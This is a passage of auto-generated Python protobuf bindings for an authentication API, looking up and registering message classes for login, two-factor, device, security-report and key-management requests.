_AUTHREQUEST = DESCRIPTOR.message_types_by_name['AuthRequest']
_NEWUSERMINIMUMPARAMS = DESCRIPTOR.message_types_by_name['NewUserMinimumParams']
_PRELOGINREQUEST = DESCRIPTOR.message_types_by_name['PreLoginRequest']
_LOGINREQUEST = DESCRIPTOR.message_types_by_name['LoginRequest']
_DEVICERESPONSE = DESCRIPTOR.message_types_by_name['DeviceResponse']
_SALT = DESCRIPTOR.message_types_by_name['Salt']
_TWOFACTORCHANNEL = DESCRIPTOR.message_types_by_name['TwoFactorChannel']
_STARTLOGINREQUEST = DESCRIPTOR.message_types_by_name['StartLoginRequest']
_LOGINRESPONSE = DESCRIPTOR.message_types_by_name['LoginResponse']
_SSOUSERINFO = DESCRIPTOR.message_types_by_name['SsoUserInfo']
_PRELOGINRESPONSE = DESCRIPTOR.message_types_by_name['PreLoginResponse']
_LOGINASUSERREQUEST = DESCRIPTOR.message_types_by_name['LoginAsUserRequest']
_LOGINASUSERRESPONSE = DESCRIPTOR.message_types_by_name['LoginAsUserResponse']
_VALIDATEAUTHHASHREQUEST = DESCRIPTOR.message_types_by_name['ValidateAuthHashRequest']
_TWOFACTORCHANNELINFO = DESCRIPTOR.message_types_by_name['TwoFactorChannelInfo']
_TWOFACTORDUOSTATUS = DESCRIPTOR.message_types_by_name['TwoFactorDuoStatus']
_TWOFACTORADDREQUEST = DESCRIPTOR.message_types_by_name['TwoFactorAddRequest']
_TWOFACTORRENAMEREQUEST = DESCRIPTOR.message_types_by_name['TwoFactorRenameRequest']
_TWOFACTORADDRESPONSE = DESCRIPTOR.message_types_by_name['TwoFactorAddResponse']
_TWOFACTORDELETEREQUEST = DESCRIPTOR.message_types_by_name['TwoFactorDeleteRequest']
_TWOFACTORLISTRESPONSE = DESCRIPTOR.message_types_by_name['TwoFactorListResponse']
_TWOFACTORUPDATEEXPIRATIONREQUEST = DESCRIPTOR.message_types_by_name['TwoFactorUpdateExpirationRequest']
_TWOFACTORVALIDATEREQUEST = DESCRIPTOR.message_types_by_name['TwoFactorValidateRequest']
_TWOFACTORVALIDATERESPONSE = DESCRIPTOR.message_types_by_name['TwoFactorValidateResponse']
_TWOFACTORSENDPUSHREQUEST = DESCRIPTOR.message_types_by_name['TwoFactorSendPushRequest']
_LICENSE = DESCRIPTOR.message_types_by_name['License']
_OWNERLESSRECORD = DESCRIPTOR.message_types_by_name['OwnerlessRecord']
_OWNERLESSRECORDS = DESCRIPTOR.message_types_by_name['OwnerlessRecords']
_USERAUTHREQUEST = DESCRIPTOR.message_types_by_name['UserAuthRequest']
_UIDREQUEST = DESCRIPTOR.message_types_by_name['UidRequest']
_DEVICEUPDATEREQUEST = DESCRIPTOR.message_types_by_name['DeviceUpdateRequest']
_REGISTERDEVICEINREGIONREQUEST = DESCRIPTOR.message_types_by_name['RegisterDeviceInRegionRequest']
_REGISTRATIONREQUEST = DESCRIPTOR.message_types_by_name['RegistrationRequest']
_CONVERTUSERTOV3REQUEST = DESCRIPTOR.message_types_by_name['ConvertUserToV3Request']
_REVISIONRESPONSE = DESCRIPTOR.message_types_by_name['RevisionResponse']
_CHANGEEMAILREQUEST = DESCRIPTOR.message_types_by_name['ChangeEmailRequest']
_CHANGEEMAILRESPONSE = DESCRIPTOR.message_types_by_name['ChangeEmailResponse']
_EMAILVERIFICATIONLINKRESPONSE = DESCRIPTOR.message_types_by_name['EmailVerificationLinkResponse']
_SECURITYDATA = DESCRIPTOR.message_types_by_name['SecurityData']
_SECURITYDATAREQUEST = DESCRIPTOR.message_types_by_name['SecurityDataRequest']
_SECURITYREPORTINCREMENTALDATA = DESCRIPTOR.message_types_by_name['SecurityReportIncrementalData']
_SECURITYREPORT = DESCRIPTOR.message_types_by_name['SecurityReport']
_SECURITYREPORTSAVEREQUEST = DESCRIPTOR.message_types_by_name['SecurityReportSaveRequest']
_SECURITYREPORTREQUEST = DESCRIPTOR.message_types_by_name['SecurityReportRequest']
_SECURITYREPORTRESPONSE = DESCRIPTOR.message_types_by_name['SecurityReportResponse']
_REUSEDPASSWORDSREQUEST = DESCRIPTOR.message_types_by_name['ReusedPasswordsRequest']
_SUMMARYCONSOLEREPORT = DESCRIPTOR.message_types_by_name['SummaryConsoleReport']
_CHANGETOKEYTYPEONE = DESCRIPTOR.message_types_by_name['ChangeToKeyTypeOne']
_CHANGETOKEYTYPEONEREQUEST = DESCRIPTOR.message_types_by_name['ChangeToKeyTypeOneRequest']
_CHANGETOKEYTYPEONESTATUS = DESCRIPTOR.message_types_by_name['ChangeToKeyTypeOneStatus']
_CHANGETOKEYTYPEONERESPONSE = DESCRIPTOR.message_types_by_name['ChangeToKeyTypeOneResponse']
_SETKEY = DESCRIPTOR.message_types_by_name['SetKey']
_SETKEYREQUEST = DESCRIPTOR.message_types_by_name['SetKeyRequest']
_CREATEUSERREQUEST = DESCRIPTOR.message_types_by_name['CreateUserRequest']
_NODEENFORCEMENTADDORUPDATEREQUEST = DESCRIPTOR.message_types_by_name['NodeEnforcementAddOrUpdateRequest']
_NODEENFORCEMENTREMOVEREQUEST = DESCRIPTOR.message_types_by_name['NodeEnforcementRemoveRequest']
_APIREQUESTBYKEY = DESCRIPTOR.message_types_by_name['ApiRequestByKey']
_MEMCACHEREQUEST = DESCRIPTOR.message_types_by_name['MemcacheRequest']
_MEMCACHERESPONSE = DESCRIPTOR.message_types_by_name['MemcacheResponse']
_MASTERPASSWORDREENTRYREQUEST = DESCRIPTOR.message_types_by_name['MasterPasswordReentryRequest']
_DEVICEREGISTRATIONREQUEST = DESCRIPTOR.message_types_by_name['DeviceRegistrationRequest']
_DEVICEVERIFICATIONREQUEST = DESCRIPTOR.message_types_by_name['DeviceVerificationRequest']
_DEVICEVERIFICATIONRESPONSE = DESCRIPTOR.message_types_by_name['DeviceVerificationResponse']
_DEVICEAPPROVALREQUEST = DESCRIPTOR.message_types_by_name['DeviceApprovalRequest']
_DEVICEAPPROVALRESPONSE = DESCRIPTOR.message_types_by_name['DeviceApprovalResponse']
_APPROVEDEVICEREQUEST = DESCRIPTOR.message_types_by_name['ApproveDeviceRequest']
_ENTERPRISEUSERALIASREQUEST = DESCRIPTOR.message_types_by_name['EnterpriseUserAliasRequest']
_ENTERPRISEUSERADDALIASREQUEST = DESCRIPTOR.message_types_by_name['EnterpriseUserAddAliasRequest']
_DEVICE = DESCRIPTOR.message_types_by_name['Device']
_REGISTERDEVICEDATAKEYREQUEST = DESCRIPTOR.message_types_by_name['RegisterDeviceDataKeyRequest']
_VALIDATECREATEUSERVERIFICATIONCODEREQUEST = DESCRIPTOR.message_types_by_name['ValidateCreateUserVerificationCodeRequest']
_VALIDATEDEVICEVERIFICATIONCODEREQUEST = DESCRIPTOR.message_types_by_name['ValidateDeviceVerificationCodeRequest']
_SENDSESSIONMESSAGEREQUEST = DESCRIPTOR.message_types_by_name['SendSessionMessageRequest']
_GLOBALUSERACCOUNT = DESCRIPTOR.message_types_by_name['GlobalUserAccount']
_ACCOUNTUSERNAME = DESCRIPTOR.message_types_by_name['AccountUsername']
_SSOSERVICEPROVIDERREQUEST = DESCRIPTOR.message_types_by_name['SsoServiceProviderRequest']
_SSOSERVICEPROVIDERRESPONSE = DESCRIPTOR.message_types_by_name['SsoServiceProviderResponse']
_USERSETTINGREQUEST = DESCRIPTOR.message_types_by_name['UserSettingRequest']
_THROTTLESTATE = DESCRIPTOR.message_types_by_name['ThrottleState']
_THROTTLESTATE2 = DESCRIPTOR.message_types_by_name['ThrottleState2']
_DEVICEINFORMATION = DESCRIPTOR.message_types_by_name['DeviceInformation']
_USERSETTING = DESCRIPTOR.message_types_by_name['UserSetting']
_USERDATAKEYREQUEST = DESCRIPTOR.message_types_by_name['UserDataKeyRequest']
_ENTERPRISEUSERIDDATAKEYPAIR = DESCRIPTOR.message_types_by_name['EnterpriseUserIdDataKeyPair']
_USERDATAKEY = DESCRIPTOR.message_types_by_name['UserDataKey']
_USERDATAKEYRESPONSE = DESCRIPTOR.message_types_by_name['UserDataKeyResponse']
_MASTERPASSWORDRECOVERYVERIFICATIONREQUEST = DESCRIPTOR.message_types_by_name['MasterPasswordRecoveryVerificationRequest']
_GETSECURITYQUESTIONV3REQUEST = DESCRIPTOR.message_types_by_name['GetSecurityQuestionV3Request']
_GETSECURITYQUESTIONV3RESPONSE = DESCRIPTOR.message_types_by_name['GetSecurityQuestionV3Response']
_GETDATAKEYBACKUPV3REQUEST = DESCRIPTOR.message_types_by_name['GetDataKeyBackupV3Request']
_PASSWORDRULES = DESCRIPTOR.message_types_by_name['PasswordRules']
_GETDATAKEYBACKUPV3RESPONSE = DESCRIPTOR.message_types_by_name['GetDataKeyBackupV3Response']
_GETPUBLICKEYSREQUEST = DESCRIPTOR.message_types_by_name['GetPublicKeysRequest']
_PUBLICKEYRESPONSE = DESCRIPTOR.message_types_by_name['PublicKeyResponse']
_GETPUBLICKEYSRESPONSE = DESCRIPTOR.message_types_by_name['GetPublicKeysResponse']
_SETECCKEYPAIRREQUEST = DESCRIPTOR.message_types_by_name['SetEccKeyPairRequest']
_ADDAPPSHARESREQUEST = DESCRIPTOR.message_types_by_name['AddAppSharesRequest']
_REMOVEAPPSHARESREQUEST = DESCRIPTOR.message_types_by_name['RemoveAppSharesRequest']
_APPSHAREADD = DESCRIPTOR.message_types_by_name['AppShareAdd']
_APPSHARE = DESCRIPTOR.message_types_by_name['AppShare']
_ADDAPPCLIENTREQUEST = DESCRIPTOR.message_types_by_name['AddAppClientRequest']
_REMOVEAPPCLIENTSREQUEST = DESCRIPTOR.message_types_by_name['RemoveAppClientsRequest']
_ADDEXTERNALSHAREREQUEST = DESCRIPTOR.message_types_by_name['AddExternalShareRequest']
_APPCLIENT = DESCRIPTOR.message_types_by_name['AppClient']
_GETAPPINFOREQUEST = DESCRIPTOR.message_types_by_name['GetAppInfoRequest']
_APPINFO = DESCRIPTOR.message_types_by_name['AppInfo']
_GETAPPINFORESPONSE = DESCRIPTOR.message_types_by_name['GetAppInfoResponse']
_APPLICATIONSUMMARY = DESCRIPTOR.message_types_by_name['ApplicationSummary']
_GETAPPLICATIONSSUMMARYRESPONSE = DESCRIPTOR.message_types_by_name['GetApplicationsSummaryResponse']
_GETVERIFICATIONTOKENREQUEST = DESCRIPTOR.message_types_by_name['GetVerificationTokenRequest']
_GETVERIFICATIONTOKENRESPONSE = DESCRIPTOR.message_types_by_name['GetVerificationTokenResponse']
_SENDSHAREINVITEREQUEST = DESCRIPTOR.message_types_by_name['SendShareInviteRequest']
_TIMELIMITEDACCESSREQUEST = DESCRIPTOR.message_types_by_name['TimeLimitedAccessRequest']
_TIMELIMITEDACCESSRESPONSE = DESCRIPTOR.message_types_by_name['TimeLimitedAccessResponse']
_REQUESTDOWNLOADREQUEST = DESCRIPTOR.message_types_by_name['RequestDownloadRequest']
_REQUESTDOWNLOADRESPONSE = DESCRIPTOR.message_types_by_name['RequestDownloadResponse']
_DOWNLOAD = DESCRIPTOR.message_types_by_name['Download']
_DELETEUSERREQUEST = DESCRIPTOR.message_types_by_name['DeleteUserRequest']
ApiRequest = _reflection.GeneratedProtocolMessageType('ApiRequest', (_message.Message,), {
'DESCRIPTOR' : _APIREQUEST,
'__module__' : 'APIRequest_pb2'
# @@protoc_insertion_point(class_scope:Authentication.ApiRequest)
})
_sym_db.RegisterMessage(ApiRequest)
ApiRequestPayload = _reflection.GeneratedProtocolMessageType('ApiRequestPayload', (_message.Message,), {
'DESCRIPTOR' : _APIREQUESTPAYLOAD,
'__module__' : 'APIRequest_pb2'
# @@protoc_insertion_point(class_scope:Authentication.ApiRequestPayload)
})
_sym_db.RegisterMessage(ApiRequestPayload)
Transform = _reflection.GeneratedProtocolMessageType('Transform', (_message.Message,), {
'DESCRIPTOR' : _TRANSFORM,
'__module__' : 'APIRequest_pb2'
# @@protoc_insertion_point(class_scope:Authentication.Transform)
})
_sym_db.RegisterMessage(Transform)
DeviceRequest = _reflection.GeneratedProtocolMessageType('DeviceRequest', (_message.Message,), {
'DESCRIPTOR' : _DEVICEREQUEST,
'__module__' : 'APIRequest_pb2'
# @@protoc_insertion_point(class_scope:Authentication.DeviceRequest)
})
_sym_db.RegisterMessage(DeviceRequest)
AuthRequest = _reflection.GeneratedProtocolMessageType('AuthRequest', (_message.Message,), {
'DESCRIPTOR' : _AUTHREQUEST,
'__module__' : 'APIRequest_pb2'
# @@protoc_insertion_point(class_scope:Authentication.AuthRequest)
})
_sym_db.RegisterMessage(AuthRequest)
NewUserMinimumParams = _reflection.GeneratedProtocolMessageType('NewUserMinimumParams', (_message.Message,), {
'DESCRIPTOR' : _NEWUSERMINIMUMPARAMS,
'__module__' : 'APIRequest_pb2'
# @@protoc_insertion_point(class_scope:Authentication.NewUserMinimumParams)
})
_sym_db.RegisterMessage(NewUserMinimumParams)
PreLoginRequest = _reflection.GeneratedProtocolMessageType('PreLoginRequest', (_message.Message,), {
'DESCRIPTOR' : _PRELOGINREQUEST,
'__module__' : 'APIRequest_pb2'
# @@protoc_insertion_point(class_scope:Authentication.PreLoginRequest)
})
_sym_db.RegisterMessage(PreLoginRequest)
LoginRequest = _reflection.GeneratedProtocolMessageType('LoginRequest', (_message.Message,), {
'DESCRIPTOR' : _LOGINREQUEST,
'__module__' : 'APIRequest_pb2'
# @@protoc_insertion_point(class_scope:Authentication.LoginRequest)
})
_sym_db.RegisterMessage(LoginRequest)
DeviceResponse = _reflection.GeneratedProtocolMessageType('DeviceResponse', (_message.Message,), {
'DESCRIPTOR' : _DEVICERESPONSE,
'__module__' : 'APIRequest_pb2'
# @@protoc_insertion_point(class_scope:Authentication.DeviceResponse)
})
_sym_db.RegisterMessage(DeviceResponse)
Salt = _reflection.GeneratedProtocolMessageType('Salt', (_message.Message,), {
'DESCRIPTOR' : _SALT,
'__module__' : 'APIRequest_pb2'
# @@protoc_insertion_point(class_scope:Authentication.Salt)
})
_sym_db.RegisterMessage(Salt)
TwoFactorChannel = _reflection.GeneratedProtocolMessageType('TwoFactorChannel', (_message.Message,), {
'DESCRIPTOR' : _TWOFACTORCHANNEL,
'__module__' : 'APIRequest_pb2'
# @@protoc_insertion_point(class_scope:Authentication.TwoFactorChannel)
})
_sym_db.RegisterMessage(TwoFactorChannel)
StartLoginRequest = _reflection.GeneratedProtocolMessageType('StartLoginRequest', (_message.Message,), {
'DESCRIPTOR' : _STARTLOGINREQUEST,
'__module__' : 'APIRequest_pb2'
# @@protoc_insertion_point(class_scope:Authentication.StartLoginRequest)
})
_sym_db.RegisterMessage(StartLoginRequest)
LoginResponse = _reflection.GeneratedProtocolMessageType('LoginResponse', (_message.Message,), {
'DESCRIPTOR' : _LOGINRESPONSE,
'__module__' : 'APIRequest_pb2'
# @@protoc_insertion_point(class_scope:Authentication.LoginResponse)
})
_sym_db.RegisterMessage(LoginResponse)
SsoUserInfo = _reflection.GeneratedProtocolMessageType('SsoUserInfo', (_message.Message,), {
'DESCRIPTOR' : _SSOUSERINFO,
'__module__' : 'APIRequest_pb2'
# @@protoc_insertion_point(class_scope:Authentication.SsoUserInfo)
})
_sym_db.RegisterMessage(SsoUserInfo)
PreLoginResponse = _reflection.GeneratedProtocolMessageType('PreLoginResponse', (_message.Message,), {
'DESCRIPTOR' : _PRELOGINRESPONSE,
'__module__' : 'APIRequest_pb2'
# @@protoc_insertion_point(class_scope:Authentication.PreLoginResponse)
})
_sym_db.RegisterMessage(PreLoginResponse)
LoginAsUserRequest = _reflection.GeneratedProtocolMessageType('LoginAsUserRequest', (_message.Message,), {
'DESCRIPTOR' : _LOGINASUSERREQUEST,
'__module__' : 'APIRequest_pb2'
# @@protoc_insertion_point(class_scope:Authentication.LoginAsUserRequest)
})
_sym_db.RegisterMessage(LoginAsUserRequest)
LoginAsUserResponse = _reflection.GeneratedProtocolMessageType('LoginAsUserResponse', (_message.Message,), {
'DESCRIPTOR' : _LOGINASUSERRESPONSE,
'__module__' : 'APIRequest_pb2'
# @@protoc_insertion_point(class_scope:Authentication.LoginAsUserResponse)
})
_sym_db.RegisterMessage(LoginAsUserResponse)
ValidateAuthHashRequest = _reflection.GeneratedProtocolMessageType('ValidateAuthHashRequest', (_message.Message,), {
'DESCRIPTOR' : _VALIDATEAUTHHASHREQUEST,
'__module__' : 'APIRequest_pb2'
# @@protoc_insertion_point(class_scope:Authentication.ValidateAuthHashRequest)
})
_sym_db.RegisterMessage(ValidateAuthHashRequest)
TwoFactorChannelInfo = _reflection.GeneratedProtocolMessageType('TwoFactorChannelInfo', (_message.Message,), {
'DESCRIPTOR' : _TWOFACTORCHANNELINFO,
'__module__' : 'APIRequest_pb2'
# @@protoc_insertion_point(class_scope:Authentication.TwoFactorChannelInfo)
})
_sym_db.RegisterMessage(TwoFactorChannelInfo)
TwoFactorDuoStatus = _reflection.GeneratedProtocolMessageType('TwoFactorDuoStatus', (_message.Message,), {
'DESCRIPTOR' : _TWOFACTORDUOSTATUS,
'__module__' : 'APIRequest_pb2'
# @@protoc_insertion_point(class_scope:Authentication.TwoFactorDuoStatus)
})
_sym_db.RegisterMessage(TwoFactorDuoStatus)
TwoFactorAddRequest = _reflection.GeneratedProtocolMessageType('TwoFactorAddRequest', (_message.Message,), {
'DESCRIPTOR' : _TWOFACTORADDREQUEST,
'__module__' : 'APIRequest_pb2'
# @@protoc_insertion_point(class_scope:Authentication.TwoFactorAddRequest)
})
_sym_db.RegisterMessage(TwoFactorAddRequest)
TwoFactorRenameRequest = _reflection.GeneratedProtocolMessageType('TwoFactorRenameRequest', (_message.Message,), {
'DESCRIPTOR' : _TWOFACTORRENAMEREQUEST,
'__module__' : 'APIRequest_pb2'
# @@protoc_insertion_point(class_scope:Authentication.TwoFactorRenameRequest)
})
_sym_db.RegisterMessage(TwoFactorRenameRequest)
TwoFactorAddResponse = _reflection.GeneratedProtocolMessageType('TwoFactorAddResponse', (_message.Message,), {
'DESCRIPTOR' : _TWOFACTORADDRESPONSE,
'__module__' : 'APIRequest_pb2'
# @@protoc_insertion_point(class_scope:Authentication.TwoFactorAddResponse)
})
_sym_db.RegisterMessage(TwoFactorAddResponse)
TwoFactorDeleteRequest = _reflection.GeneratedProtocolMessageType('TwoFactorDeleteRequest', (_message.Message,), {
'DESCRIPTOR' : _TWOFACTORDELETEREQUEST,
'__module__' : 'APIRequest_pb2'
# @@protoc_insertion_point(class_scope:Authentication.TwoFactorDeleteRequest)
})
_sym_db.RegisterMessage(TwoFactorDeleteRequest)
TwoFactorListResponse = _reflection.GeneratedProtocolMessageType('TwoFactorListResponse', (_message.Message,), {
'DESCRIPTOR' : _TWOFACTORLISTRESPONSE,
'__module__' : 'APIRequest_pb2'
# @@protoc_insertion_point(class_scope:Authentication.TwoFactorListResponse)
})
_sym_db.RegisterMessage(TwoFactorListResponse)
TwoFactorUpdateExpirationRequest = _reflection.GeneratedProtocolMessageType('TwoFactorUpdateExpirationRequest', (_message.Message,), {
'DESCRIPTOR' : _TWOFACTORUPDATEEXPIRATIONREQUEST,
'__module__' : 'APIRequest_pb2'
# @@protoc_insertion_point(class_scope:Authentication.TwoFactorUpdateExpirationRequest)
})
_sym_db.RegisterMessage(TwoFactorUpdateExpirationRequest)
TwoFactorValidateRequest = _reflection.GeneratedProtocolMessageType('TwoFactorValidateRequest', (_message.Message,), {
'DESCRIPTOR' : _TWOFACTORVALIDATEREQUEST,
'__module__' : 'APIRequest_pb2'
# @@protoc_insertion_point(class_scope:Authentication.TwoFactorValidateRequest)
})
_sym_db.RegisterMessage(TwoFactorValidateRequest)
TwoFactorValidateResponse = _reflection.GeneratedProtocolMessageType('TwoFactorValidateResponse', (_message.Message,), {
'DESCRIPTOR' : _TWOFACTORVALIDATERESPONSE,
'__module__' : 'APIRequest_pb2'
# @@protoc_insertion_point(class_scope:Authentication.TwoFactorValidateResponse)
})
_sym_db.RegisterMessage(TwoFactorValidateResponse)
TwoFactorSendPushRequest = _reflection.GeneratedProtocolMessageType('TwoFactorSendPushRequest', (_message.Message,), {
'DESCRIPTOR' : _TWOFACTORSENDPUSHREQUEST,
'__module__' : 'APIRequest_pb2'
# @@protoc_insertion_point(class_scope:Authentication.TwoFactorSendPushRequest)
})
_sym_db.RegisterMessage(TwoFactorSendPushRequest)
License = _reflection.GeneratedProtocolMessageType('License', (_message.Message,), {
'DESCRIPTOR' : _LICENSE,
'__module__' : 'APIRequest_pb2'
# @@protoc_insertion_point(class_scope:Authentication.License)
})
_sym_db.RegisterMessage(License)
OwnerlessRecord = _reflection.GeneratedProtocolMessageType('OwnerlessRecord', (_message.Message,), {
'DESCRIPTOR' : _OWNERLESSRECORD,
'__module__' : 'APIRequest_pb2'
# @@protoc_insertion_point(class_scope:Authentication.OwnerlessRecord)
})
_sym_db.RegisterMessage(OwnerlessRecord)
OwnerlessRecords = _reflection.GeneratedProtocolMessageType('OwnerlessRecords', (_message.Message,), {
'DESCRIPTOR' : _OWNERLESSRECORDS,
'__module__' : 'APIRequest_pb2'
# @@protoc_insertion_point(class_scope:Authentication.OwnerlessRecords)
})
_sym_db.RegisterMessage(OwnerlessRecords)
UserAuthRequest = _reflection.GeneratedProtocolMessageType('UserAuthRequest', (_message.Message,), {
'DESCRIPTOR' : _USERAUTHREQUEST,
'__module__' : 'APIRequest_pb2'
# @@protoc_insertion_point(class_scope:Authentication.UserAuthRequest)
})
_sym_db.RegisterMessage(UserAuthRequest)
UidRequest = _reflection.GeneratedProtocolMessageType('UidRequest', (_message.Message,), {
'DESCRIPTOR' : _UIDREQUEST,
'__module__' : 'APIRequest_pb2'
# @@protoc_insertion_point(class_scope:Authentication.UidRequest)
})
_sym_db.RegisterMessage(UidRequest)
DeviceUpdateRequest = _reflection.GeneratedProtocolMessageType('DeviceUpdateRequest', (_message.Message,), {
'DESCRIPTOR' : _DEVICEUPDATEREQUEST,
'__module__' : 'APIRequest_pb2'
# @@protoc_insertion_point(class_scope:Authentication.DeviceUpdateRequest)
})
_sym_db.RegisterMessage(DeviceUpdateRequest)
RegisterDeviceInRegionRequest = _reflection.GeneratedProtocolMessageType('RegisterDeviceInRegionRequest', (_message.Message,), {
'DESCRIPTOR' : _REGISTERDEVICEINREGIONREQUEST,
'__module__' : 'APIRequest_pb2'
# @@protoc_insertion_point(class_scope:Authentication.RegisterDeviceInRegionRequest)
})
_sym_db.RegisterMessage(RegisterDeviceInRegionRequest)
RegistrationRequest = _reflection.GeneratedProtocolMessageType('RegistrationRequest', (_message.Message,), {
'DESCRIPTOR' : _REGISTRATIONREQUEST,
'__module__' : 'APIRequest_pb2'
# @@protoc_insertion_point(class_scope:Authentication.RegistrationRequest)
})
_sym_db.RegisterMessage(RegistrationRequest)
ConvertUserToV3Request = _reflection.GeneratedProtocolMessageType('ConvertUserToV3Request', (_message.Message,), {
'DESCRIPTOR' : _CONVERTUSERTOV3REQUEST,
'__module__' : 'APIRequest_pb2'
# @@protoc_insertion_point(class_scope:Authentication.ConvertUserToV3Request)
})
_sym_db.RegisterMessage(ConvertUserToV3Request)
RevisionResponse = _reflection.GeneratedProtocolMessageType('RevisionResponse', (_message.Message,), {
'DESCRIPTOR' : _REVISIONRESPONSE,
'__module__' : 'APIRequest_pb2'
# @@protoc_insertion_point(class_scope:Authentication.RevisionResponse)
})
_sym_db.RegisterMessage(RevisionResponse)
ChangeEmailRequest = _reflection.GeneratedProtocolMessageType('ChangeEmailRequest', (_message.Message,), {
'DESCRIPTOR' : _CHANGEEMAILREQUEST,
'__module__' : 'APIRequest_pb2'
# @@protoc_insertion_point(class_scope:Authentication.ChangeEmailRequest)
})
_sym_db.RegisterMessage(ChangeEmailRequest)
ChangeEmailResponse = _reflection.GeneratedProtocolMessageType('ChangeEmailResponse', (_message.Message,), {
'DESCRIPTOR' : _CHANGEEMAILRESPONSE,
'__module__' : 'APIRequest_pb2'
# @@protoc_insertion_point(class_scope:Authentication.ChangeEmailResponse)
})
_sym_db.RegisterMessage(ChangeEmailResponse)
EmailVerificationLinkResponse = _reflection.GeneratedProtocolMessageType('EmailVerificationLinkResponse', (_message.Message,), {
'DESCRIPTOR' : _EMAILVERIFICATIONLINKRESPONSE,
'__module__' : 'APIRequest_pb2'
# @@protoc_insertion_point(class_scope:Authentication.EmailVerificationLinkResponse)
})
_sym_db.RegisterMessage(EmailVerificationLinkResponse)
SecurityData = _reflection.GeneratedProtocolMessageType('SecurityData', (_message.Message,), {
'DESCRIPTOR' : _SECURITYDATA,
'__module__' : 'APIRequest_pb2'
# @@protoc_insertion_point(class_scope:Authentication.SecurityData)
})
_sym_db.RegisterMessage(SecurityData)
SecurityDataRequest = _reflection.GeneratedProtocolMessageType('SecurityDataRequest', (_message.Message,), {
'DESCRIPTOR' : _SECURITYDATAREQUEST,
'__module__' : 'APIRequest_pb2'
# @@protoc_insertion_point(class_scope:Authentication.SecurityDataRequest)
})
_sym_db.RegisterMessage(SecurityDataRequest)
SecurityReportIncrementalData = _reflection.GeneratedProtocolMessageType('SecurityReportIncrementalData', (_message.Message,), {
'DESCRIPTOR' : _SECURITYREPORTINCREMENTALDATA,
'__module__' : 'APIRequest_pb2'
# @@protoc_insertion_point(class_scope:Authentication.SecurityReportIncrementalData)
})
_sym_db.RegisterMessage(SecurityReportIncrementalData)
SecurityReport = _reflection.GeneratedProtocolMessageType('SecurityReport', (_message.Message,), {
'DESCRIPTOR' : _SECURITYREPORT,
'__module__' : 'APIRequest_pb2'
# @@protoc_insertion_point(class_scope:Authentication.SecurityReport)
})
_sym_db.RegisterMessage(SecurityReport)
SecurityReportSaveRequest = _reflection.GeneratedProtocolMessageType('SecurityReportSaveRequest', (_message.Message,), {
'DESCRIPTOR' : _SECURITYREPORTSAVEREQUEST,
'__module__' : 'APIRequest_pb2'
# @@protoc_insertion_point(class_scope:Authentication.SecurityReportSaveRequest)
})
_sym_db.RegisterMessage(SecurityReportSaveRequest)
SecurityReportRequest = _reflection.GeneratedProtocolMessageType('SecurityReportRequest', (_message.Message,), {
'DESCRIPTOR' : _SECURITYREPORTREQUEST,
'__module__' : 'APIRequest_pb2'
# @@protoc_insertion_point(class_scope:Authentication.SecurityReportRequest)
})
_sym_db.RegisterMessage(SecurityReportRequest)
SecurityReportResponse = _reflection.GeneratedProtocolMessageType('SecurityReportResponse', (_message.Message,), {
'DESCRIPTOR' : _SECURITYREPORTRESPONSE,
'__module__' : 'APIRequest_pb2'
# @@protoc_insertion_point(class_scope:Authentication.SecurityReportResponse)
})
_sym_db.RegisterMessage(SecurityReportResponse)
ReusedPasswordsRequest = _reflection.GeneratedProtocolMessageType('ReusedPasswordsRequest', (_message.Message,), {
'DESCRIPTOR' : _REUSEDPASSWORDSREQUEST,
'__module__' : 'APIRequest_pb2'
# @@protoc_insertion_point(class_scope:Authentication.ReusedPasswordsRequest)
})
_sym_db.RegisterMessage(ReusedPasswordsRequest)
SummaryConsoleReport = _reflection.GeneratedProtocolMessageType('SummaryConsoleReport', (_message.Message,), {
'DESCRIPTOR' : _SUMMARYCONSOLEREPORT,
'__module__' : 'APIRequest_pb2'
# @@protoc_insertion_point(class_scope:Authentication.SummaryConsoleReport)
})
_sym_db.RegisterMessage(SummaryConsoleReport)
ChangeToKeyTypeOne = _reflection.GeneratedProtocolMessageType('ChangeToKeyTypeOne', (_message.Message,), {
'DESCRIPTOR' : _CHANGETOKEYTYPEONE,
'__module__' : 'APIRequest_pb2'
# @@protoc_insertion_point(class_scope:Authentication.ChangeToKeyTypeOne)
})
_sym_db.RegisterMessage(ChangeToKeyTypeOne)
ChangeToKeyTypeOneRequest = _reflection.GeneratedProtocolMessageType('ChangeToKeyTypeOneRequest', (_message.Message,), {
'DESCRIPTOR' : _CHANGETOKEYTYPEONEREQUEST,
'__module__' : 'APIRequest_pb2'
# @@protoc_insertion_point(class_scope:Authentication.ChangeToKeyTypeOneRequest)
})
_sym_db.RegisterMessage(ChangeToKeyTypeOneRequest)
ChangeToKeyTypeOneStatus = _reflection.GeneratedProtocolMessageType('ChangeToKeyTypeOneStatus', (_message.Message,), {
'DESCRIPTOR' : _CHANGETOKEYTYPEONESTATUS,
'__module__' : 'APIRequest_pb2'
# @@protoc_insertion_point(class_scope:Authentication.ChangeToKeyTypeOneStatus)
})
_sym_db.RegisterMessage(ChangeToKeyTypeOneStatus)
ChangeToKeyTypeOneResponse = _reflection.GeneratedProtocolMessageType('ChangeToKeyTypeOneResponse', (_message.Message,), {
'DESCRIPTOR' : _CHANGETOKEYTYPEONERESPONSE,
'__module__' : 'APIRequest_pb2'
# @@protoc_insertion_point(class_scope:Authentication.ChangeToKeyTypeOneResponse)
})
_sym_db.RegisterMessage(ChangeToKeyTypeOneResponse)
SetKey = _reflection.GeneratedProtocolMessageType('SetKey', (_message.Message,), {
'DESCRIPTOR' : _SETKEY,
'__module__' : 'APIRequest_pb2'
# @@protoc_insertion_point(class_scope:Authentication.SetKey)
})
_sym_db.RegisterMessage(SetKey)
SetKeyRequest = _reflection.GeneratedProtocolMessageType('SetKeyRequest', (_message.Message,), {
'DESCRIPTOR' : _SETKEYREQUEST,
'__module__' : 'APIRequest_pb2'
# @@protoc_insertion_point(class_scope:Authentication.SetKeyRequest)
})
_sym_db.RegisterMessage(SetKeyRequest)
CreateUserRequest = _reflection.GeneratedProtocolMessageType('CreateUserRequest', (_message.Message,), {
'DESCRIPTOR' : _CREATEUSERREQUEST,
'__module__' : 'APIRequest_pb2'
# @@protoc_insertion_point(class_scope:Authentication.CreateUserRequest)
})
_sym_db.RegisterMessage(CreateUserRequest)
NodeEnforcementAddOrUpdateRequest = _reflection.GeneratedProtocolMessageType('NodeEnforcementAddOrUpdateRequest', (_message.Message,), {
'DESCRIPTOR' : _NODEENFORCEMENTADDORUPDATEREQUEST,
'__module__' : 'APIRequest_pb2'
